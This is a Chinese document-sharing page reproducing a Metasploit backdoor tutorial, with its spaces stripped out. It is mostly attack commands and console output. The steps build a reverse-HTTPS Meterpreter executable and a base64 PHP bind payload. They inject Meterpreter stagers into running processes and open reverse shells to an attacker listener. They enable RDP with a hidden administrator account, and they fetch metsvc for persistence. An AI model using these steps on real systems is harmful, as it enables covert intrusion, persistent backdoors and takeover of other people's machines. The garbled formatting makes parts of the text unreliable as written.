Metasploit可执行后门.docx
- 文档编号:8623623
- 上传时间:2023-02-01
- 格式:DOCX
- 页数:14
- 大小:1.21MB
Metasploit可执行后门.docx
《Metasploit可执行后门.docx》由会员分享,可在线阅读,更多相关《Metasploit可执行后门.docx(14页珍藏版)》请在冰豆网上搜索。
Metasploit可执行后门
只要服务器不关闭!
大家都晓得HTTP和HTTPS是穿墙的!
detach是中断SESSION链接的命令
Php:
msfpayload(bind_php)>generate-traw-ephp/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2
brk@Dis9Team:
~$sudomsfvenom-pwindows/meterpreter/reverse_https-fexeLHOST=5.5.5.1LPORT=1111>https.exe
brk@Dis9Team:
~$filehttps.exe
https.exe:
PE32executableforMSWindows(GUI)Intel8038632-bit
上面代码:
meterpreter>resource/root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*]Reading/root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*]Runningrmc:
\windows\\FBEzRzQYpXKFg.vbs
msfexploit(ms08_067_netapi)>usepost/windows/manage/payload_inject
msfpost(payload_inject)>
msfpost(payload_inject)>showoptions
Moduleoptions(post/windows/manage/payload_inject):
NameCurrentSettingRequiredDescription
--------------------------------------
HANDLERfalsenoStartanExploitMultiHandlertoreceivetheconnection
LHOST5.5.5.1yesIPofhostthatwillreceivetheconnectionfromthepayload.
LPORT4433noPortforPayloadtoconnectto.
OPTIONSnoCommaseparatedlistofadditionaloptionsforpayloadifneededin'opt=val,opt=val'format.
PAYLOADwindows/meterpreter/reverse_tcpnoWindowsPayloadtoinjectintomemoryofaprocess.
PIDnoProcessIdentifiertoinjectofprocesstoinjectpayload.
SESSIONyesThesessiontorunthismoduleon.
msfpost(payload_inject)>setPAYLOADwindows/meterpreter/reverse_https
PAYLOAD=>windows/meterpreter/reverse_https
msfpost(payload_inject)>setLPORT9999
LPORT=>9999
msfpost(payload_inject)>setTimestampOutput0
TimestampOutput=>0
msfpost(payload_inject)>setSESSION5
SESSION=>5
msfpost(payload_inject)>exploit
[*]RunningmoduleagainstDIS9TEAM-A1
[*]PerformingArchitectureCheck
[*]ProcessfoundcheckingArchitecture
[+]Processisthesamearchitectureasthepayload
[*]InjectingWindowsMeterpreter(ReflectiveInjection),ReverseHTTPSStagerintoprocessID1636
[*]Openingprocess1636
[*]Generatingpayload
[*]Allocatingmemoryinprocees1636
[*]Allocatedmemoryataddress0x00780000,for363bytestager
[*]Writingthestagerintomemory...
[+]Successfullyinjectedpayloadintoprocess:
1636
[*]Postmoduleexecutioncompleted
msfpost(payload_inject)>sessions
Activesessions
===============
IdTypeInformationConnection
---------------------------
4meterpreterx86/win32DIS9TEAM-A1\brk@DIS9TEAM-A15.5.5.1:
1111->5.5.5.3:
1280(5.5.5.3)
5meterpreterx86/win32NTAUTHORITY\SYSTEM@DIS9TEAM-A15.5.5.1:
4444->5.5.5.3:
1042(5.5.5.3)
msfpost(payload_inject)>
msfpost(system_session)>showoptions
Moduleoptions(post/multi/manage/system_session):
NameCurrentSettingRequiredDescription
--------------------------------------
HANDLERfalseyesStartanExploitMultiHandlertoreceivetheconnection
LHOST5.5.5.1yesIPofhostthatwillreceivetheconnectionfromthepayload.
LPORT4433noPortforPayloadtoconnectto.
SESSIONyesThesessiontorunthismoduleon.
TYPEautoyesScriptingenvironmentontargettouseforreverseshell(accepted:
auto,ruby,python,perl,bash)
msfpost(system_session)>setHANDLERtrue
HANDLER=>true
msfpost(system_session)>sessions
Activesessions
===============
IdTypeInformationConnection
---------------------------
4meterpreterx86/win32DIS9TEAM-A1\brk@DIS9TEAM-A15.5.5.1:
1111->5.5.5.3:
1280(5.5.5.3)
5meterpreterx86/win32NTAUTHORITY\SYSTEM@DIS9TEAM-A15.5.5.1:
4444->5.5.5.3:
1042(5.5.5.3)
msfpost(system_session)>setSESSION5
SESSION=>5
msfpost(system_session)>exploit
[-]Postfailed:
Msf:
:
OptionValidateErrorThefollowingoptionsfailedtovalidate:
TYPE.
msfpost(system_session)>setTYPEbash
TYPE=>bash
msfpost(system_session)>exploit
[*]Startingexploitmultihandler
[*]Startedreversehandleron5.5.5.1:
4433
[*]Startingthepayloadhandler...
[*]Postmoduleexecutioncompleted
msfpost(system_session)>setTYPEpython
TYPE=>python
msfpost(system_session)>exploit
[*]Startingexploitmultihandler
[-]Job4islisteningonIP5.5.5.1andport4433
[-]Couldnotstarthandler!
[-]AjobislisteningonthesamePort
[*]Postmoduleexecutioncompleted
msfpost(system_session)>setLPORT5555
LPORT=>5555
msfpost(system_session)>exploit
[*]Startingexploitmultihandler
[*]Startedreversehandleron5.5.5.1:
5555
[*]Startingthepayloadhandler...
[*]Postmoduleexecutioncompleted
msfpost(system_session)>
自动开3389:
很简单,进入模块设置帐号密码。
端口,SESSION填(如下ID):
帐号密码加不了的话就进入到session的shell里加并添加管理组
msfpost(enable_rdp)>showoptions
Moduleoptions(post/windows/manage/enable_rdp):
NameCurrentSettingRequiredDescription
--------------------------------------
ENABLEtruenoEnabletheRDPServiceandFirewallException.
FORDWARDfalsenoForwardremoteport3389tolocalPort.
LPORT3389noLocalporttofordwardremoteconnection.
PASSWORDnoPasswordfortheusercreated.
SESSIONyesThesessiontorunthismoduleon.
USERNAMEnoTheusernameoftheusertocreate.
msfpost(enable_rdp)>setUSERNAMEtest
USERNAME=>test
msfpost(enable_rdp)>setPASSWORDtest
PASSWORD=>test
msfpost(enable_rdp)>setSESSION5
SESSION=>5
msfpost(enable_rdp)>exploit
[*]EnablingRemoteDesktop
[*]RDPisdisabled;enablingit...
[*]SettingTerminalServicesservicestartupmode
[*]TheTerminalServicesserviceisnotsettoauto,changingittoauto...
[*]Openingportinlocalfirewallifnecessary
[*]Settinguseraccountforlogon
[*]AddingUser:
testwithPassword:
test
[*]AddingUser:
testtolocalgroup'RemoteDesktopUsers'
[*]AddingUser:
testtolocalgroup'Administrators'
[*]Youcannowloginwiththecreateduser
[*]ForcleanupexecuteMeterpreterresourcefile:
/root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*]Postmoduleexecutioncompleted
msfpost(enable_rdp)>
msfpost(enable_rdp)>usepost/windows/manage/multi_meterpreter_inject
msfpost(multi_meterpreter_inject)>setPAYLOADwindows/meterpreter/reverse_tcp
msfpost(multi_meterpreter_inject)>setHANDLERtrue
HANDLER=>true
msfpost(multi_meterpreter_inject)>setLPORT5624
LPORT=>5624
msfpost(multi_meterpreter_inject)>exploit
[*]RunningmoduleagainstDIS9TEAM-A1
[*]Startingconnectionhandleratport5624forwindows/meterpreter/reverse_tcp
[+]Multi/Handlerstarted!
[*]Creatingareversemeterpreterstager:
LHOST=5.5.5.1LPORT=5624
[+]StartingNotepad.exetohouseMeterpreterSession.
[+]Processcreatedwithpid1168
[*]InjectingmeterpreterintoprocessID1168
[*]Allocatedmemoryataddress0x00780000,for290bytestager
[*]Writingthestagerintomemory...
[+]SuccessfullyinjectedMeterpreterintoprocess:
1168
[*]Meterpretersession6opened(5.5.5.1:
5624->5.5.5.3:
1064)at2012-03-2200:
40:
19+0800
[*]Postmoduleexecutioncompleted
msfpost(multi_meterpreter_inject)>
成功获得了SHELL
brk@Dis9Team:
/tmp$wgethttp:
//www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-2200:
54:
49--http:
//www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机www.phreedom.org...66.45.226.226
正在连接www.phreedom.org|66.45.226.226|:
80...已连接。
已发出HTTP请求,正在等待回应...200OK
长度:
55871(55K)[application/zip]
正在保存至:
“metsvc-1.0.zip”
100%[======================================>]55,87146.2K/s花时1.2s
2012-03-2200:
54:
52(46.2KB/s)-已保存“metsvc-1.0.zip”[55871/55871])
brk@Dis9Team:
/tmp$unzipmetsvc-1.0.zip
Archive:
metsvc-1.0.zip
creating:
metsvc-1.0/
inflating:
metsvc-1.0/ChangeLog.txt
inflating:
metsvc-1.0/metsvc-server.exe
inflating:
metsvc-1.0/metsvc.exe
inflating:
metsvc-1.0/README.txt
creating:
metsvc-1.0/src/
inflating:
metsvc-1.0/src/Makefile
inflating:
metsvc-1.0/src/metsvc-server.cpp
inflating:
metsvc-1.0/src/metsvc.cpp
inflating:
metsvc-1.0/src/metsvc.h
inflating:
metsvc-1.0/test.rb
brk@Dis9Team:
/tmp$cdmetsvc-1.0/
brk@Dis9Team:
/tmp/metsvc-1.0$cp/pen/msf3/data/meterpreter/met
metcli.exemeterpreter.phpmetsrv.x64.dllmetsvc-server.exe
meterpreter.jarmetsrv.dllmetsvc.exe
brk@Dis9Team:
/tmp/metsvc-1.0$cp/pen/msf3/data/meterpreter/metsrv.dll.
brk@Dis9Team:
/tmp/metsvc-1.0$ls
ChangeLog.txtmetsvc.exeREADME.txttest.rb
metsrv.dllmetsvc-server.exesrc
brk@Dis9Team:
/tmp/metsvc-1.0$
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Metasploit 可执行 后门